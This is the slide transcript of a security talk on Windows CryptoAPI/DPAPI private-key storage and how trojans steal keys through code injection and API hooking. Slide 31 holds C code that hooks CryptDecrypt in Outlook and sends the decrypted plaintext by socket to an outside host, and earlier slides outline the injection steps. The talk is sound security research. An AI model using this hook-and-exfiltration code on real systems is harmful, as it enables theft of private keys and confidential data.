Presentation is loading. Please wait.

Presentation is loading. Please wait.

Catch the key if you can Aurélien BORDES Éric DETOISIEN.

Similar presentations


Presentation on theme: "Catch the key if you can Aurélien BORDES Éric DETOISIEN."— Presentation transcript:

1 Catch the key if you can Aurélien BORDES Éric DETOISIEN

2 Summary 1.Introduction 2.What keys ? 3.CryptoAPI / DPAPI 4.Software protection under Windows 5.Code injection and API Hooking 6.Conclusion

3 Summary 1.Introduction 2.What keys? 3.CryptoAPI / DPAPI 4.Software protection under Windows 5.Code injection and API Hooking 6.Conclusion

4 Introduction More and more PKI (Public Key Infrastructure) deployments Certificates used in digital signature, crypt/decrypt operations and authentication Data protection in this game is critical What is the security behind the use of this technology in Microsoft environment?

5 Summary 1.Introduction 2.What keys? 3.CryptoAPI / DPAPI 4.Software protection under Windows 5.Code injection and API Hooking 6.Conclusion

6 What keys ? RSA is an asymmetric-key cryptosystem It uses two keys : a public key used for verification or encryption a private key used for signing or decryption The public key must be widely distributed (X509 certificates) The private key must be kept by the owner as a protected form (software or hardware)

7 Summary 1.Introduction 2.What keys? 3.CryptoAPI / DPAPI 4.Software protection under Windows 5.Code injection and API Hooking 6.Conclusion

8 CryptoAPI Provide cryptographic functions Base cryptographic functions Context functions Key exchange functions Certificate encode/decode functions Encrypt or decrypt Hash Certificate store functions Simplified message functions Low-level message functions

9 CSP Cryptographic Service Provider Independent modules Implement the cryptographic functions Provide protection for private keys Microsoft CSP: based on DPAPI Third-party CSP: based on hardware devices

10 CSP Cryptographic Provider Types: –PROV_RSA_FULL –PROV_RSA_AES –PROV_RSA_SCHANNEL –PROV_DH_SCHANNEL

11 Microsoft CSP PROV_RSA_FULL –Microsoft Base Cryptographic Provider –Microsoft Enhanced/Strong Cryptographic Provider PROV_RSA_AES –Microsoft AES Cryptographic Provider PROV_RSA_SCHANNEL –Microsoft RSA/Schannel Cryptographic Provider PROV_DH_SCHANNEL –Microsoft DSS and Diffie-Hellman/Schannel Cryptographic Provider

12

13 DPAPI Data Protection Application Programming Interface Provide OS-level data protection services to user and system Protection based on encryption (3DES) Main idea : session keys are never stored but are reconstructed for the encryption or decryption operations

14 DPAPI Generation of a strong secret protected by the user’s password (PKCS#5: PBKDF2, 3DES and SHA-1) Stored in the user’s profile: c:\Documents and Settings\ \Application Data\Microsoft\Protect\ \

15 DPAPI DPAPI Blob Master Key « Some random data » Application entropy Session key generated Clear « Some random data » GUID Master key User entropy Encrypted Protected with user credential Optional: additional password specified by the user

16 CryptProtectData BOOL WINAPI CryptProtectData ( DATA_BLOB *pDataIn, LPCWSTR szDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut) dwFlags (CRYPTPROTECT_LOCAL_MACHINE) : all local users can unprotect data. Machine keys are protected with this flag

17 CryptUnprotectData BOOL WINAPI CryptUnprotectData ( DATA_BLOB *pDataIn, LPCWSTR *ppszDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut)

18 DPAPI Protection level of DPAPI Low : protection/unprotection operations of data is transparent (flag CRYPTPROTECT_PROMPTSTRUCT no set) Medium : user confirmation required for protection/unprotection operations High : additional user entropy required : user must submit password for protection/unprotection operations

19 Summary 1.Introduction 2.What keys? 3.CryptoAPI / DPAPI 4.Software protection under Windows 5.Code injection and API Hooking 6.Conclusion

20 Software protection under Windows Protection of private keys with Microsoft’s CSP is based on DPAPI Same levels of protection (low, medium, high) User private keys are protected with DPAPI and stored in the user’s profile: C:\Documents and Settings\ \Application Data\Microsoft\Crypto\RSA\ \ Machine private keys: C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys\

21 Software protection under Windows A trojan can read files (protected private keys) and use DPAPI functions to unprotect the keys Work only (quiet, no message) if protection level is low (default) Demo And with medium/high level protection? Perhaps with old school code injection and API Hooking

22 Delete the keys When you remove your certificate, the associated private key is not delete on the disk

23 Summary 1.Introduction 2.What keys? 3.CryptoAPI / DPAPI 4.Software protection under Windows 5.Code injection and API Hooking 6.Conclusion

24 Code injection and API Hooking Code injection in Win32 process OpenProcess VirtualAllocEx WriteProcessMemory CreateRemoteThread The trojan code is injected in the target process Possibility to hook interesting API

25 Code injection and API Hooking API Hooking in the target process Save first API instructions Patch API with a JMP to our injected code Call saved instructions and original API Interesting API to hook RtlDecryptMemory (SystemFunction041) in Advapi32.dll CertSerializeCertificateStoreElement

26 Code injection and API Hooking RtlDecryptMemory NTSTATUS RtlDecryptMemory( PVOID Memory, ULONG MemoryLength, ULONG OptionFlags); Memory is a pointer to encrypted data (private key) If the function is successful the decrypted data (plain text private key) can be read at Memory location

27 Code injection and API Hooking CertSerializeCertificateStoreElement BOOL WINAPI CertSerializeCertificateStoreElement( PCCERT_CONTEXT pCertContext, DWORD dwFlags, BYTE* pbElement, DWORD* pcbElement ); typedef struct _CERT_CONTEXT { DWORD dwCertEncodingType; BYTE* pbCertEncoded; DWORD cbCertEncoded; PCERT_INFO pCertInfo; HCERTSTORE hCertStore; } CERT_CONTEXT,*PCERT_CONTEXT; typedef const CERT_CONTEXT *PCCERT_CONTEXT;

28 Code injection and API Hooking pbCertEncoded is a pointer to DER encoded certificate API Hooking is effective to get X509 Certificate and its private key Demo

29 Can’t catch the key, but data… Sometimes, it is impossible to get the key (hardware exportation not possible) But it is very easy to get the cleartext All the decryption operations use the CryptDecrypt function If you hook this function, you got the plaintext data

30 CryptDecrypt BOOL WINAPI CryptDecrypt( HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE* pbData, DWORD* pdwDataLen ); plaintext after decryption

31 Hooking Outlook OUTLOOK Decryption: SSL/TLSS/MIME CryptoAPI CryptDecrypt CSP HOOK SOCKET s; sockaddr_in sa_in; s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); sa_in.sin_family = AF_INET; sa_in.sin_addr.s_addr =inet_addr(" "); sa_in.sin_port = htons(25); connect(s, (SOCKADDR*) & sa_in, sa_in); send(s, (char *)pbData, (int)*pdwDataLen, 0); closesocket(s);

32 Summary 1.Introduction 2.What keys? 3.CryptoAPI / DPAPI 4.Software protection under Windows 5.Code injection and API Hooking 6.Conclusion

33 Conclusion Private storage on Windows is not secure Token and smartcard are better but beware the spyware… No workstation compromise means no compromise of your keys The security needs to be everywhere


Download ppt "Catch the key if you can Aurélien BORDES Éric DETOISIEN."

Similar presentations


Ads by Google